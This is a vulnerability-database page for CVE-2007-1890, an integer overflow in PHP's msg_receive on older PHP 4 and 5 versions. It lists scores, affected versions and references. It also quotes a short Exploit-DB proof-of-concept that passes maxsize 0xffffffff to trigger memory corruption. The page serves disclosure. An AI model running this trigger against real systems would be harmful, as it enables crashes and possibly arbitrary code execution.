CVE-2007-1890 : Detail

CVE-2007-1890

0.91%V3
Network
2007-04-05
23h00 +00:00
2017-07-28
10h57 +00:00
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CVE Descriptions

Integer overflow in the msg_receive function in PHP 4 before 4.4.5 and PHP 5 before 5.2.1, on FreeBSD and possibly other platforms, allows context-dependent attackers to execute arbitrary code via certain maxsize values, as demonstrated by 0xffffffff.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

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EPSS Score

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EPSS Percentile

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Exploit information

Exploit Database EDB-ID : 29808

Publication date : 2007-03-30 22h00 +00:00
Author : Stefan Esser
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23236/info PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory. Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition. This issue affects PHP versions prior to 4.4.5 and 5.2.1. <?php $MSGKEY = 519052; $msg_id = msg_get_queue ($MSGKEY, 0600); if (!msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) echo "Msg not sent because $msg_err\n"; if (msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { echo "$msg\n"; } else { echo "Received $msg_error fetching message\n"; break; } msg_remove_queue ($msg_id); ?>

Products Mentioned

Configuraton 0

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.4

    Php>>Php >> Version 4.0.5

    Php>>Php >> Version 4.0.6

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.1.0

    Php>>Php >> Version 4.1.1

    Php>>Php >> Version 4.1.2

    Php>>Php >> Version 4.2

      Php>>Php >> Version 4.2.0

      Php>>Php >> Version 4.2.1

      Php>>Php >> Version 4.2.2

      Php>>Php >> Version 4.2.3

      Php>>Php >> Version 4.3.0

      Php>>Php >> Version 4.3.1

      Php>>Php >> Version 4.3.2

      Php>>Php >> Version 4.3.3

      Php>>Php >> Version 4.3.4

      Php>>Php >> Version 4.3.5

      Php>>Php >> Version 4.3.6

      Php>>Php >> Version 4.3.7

      Php>>Php >> Version 4.3.8

      Php>>Php >> Version 4.3.9

      Php>>Php >> Version 4.3.10

      Php>>Php >> Version 4.3.11

      Php>>Php >> Version 4.4.0

      Php>>Php >> Version 4.4.1

      Php>>Php >> Version 4.4.2

      Php>>Php >> Version 4.4.3

      Php>>Php >> Version 4.4.4

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.1

            Php>>Php >> Version 5.0.2

            Php>>Php >> Version 5.0.3

            Php>>Php >> Version 5.0.4

            Php>>Php >> Version 5.0.5

            Php>>Php >> Version 5.1.0

            Php>>Php >> Version 5.1.1

            Php>>Php >> Version 5.1.2

            Php>>Php >> Version 5.1.3

            Php>>Php >> Version 5.1.4

            Php>>Php >> Version 5.1.5

            Php>>Php >> Version 5.1.6

            Php>>Php >> Version 5.2.0

            References

            http://www.securityfocus.com/bid/23236
            Tags : vdb-entry, x_refsource_BID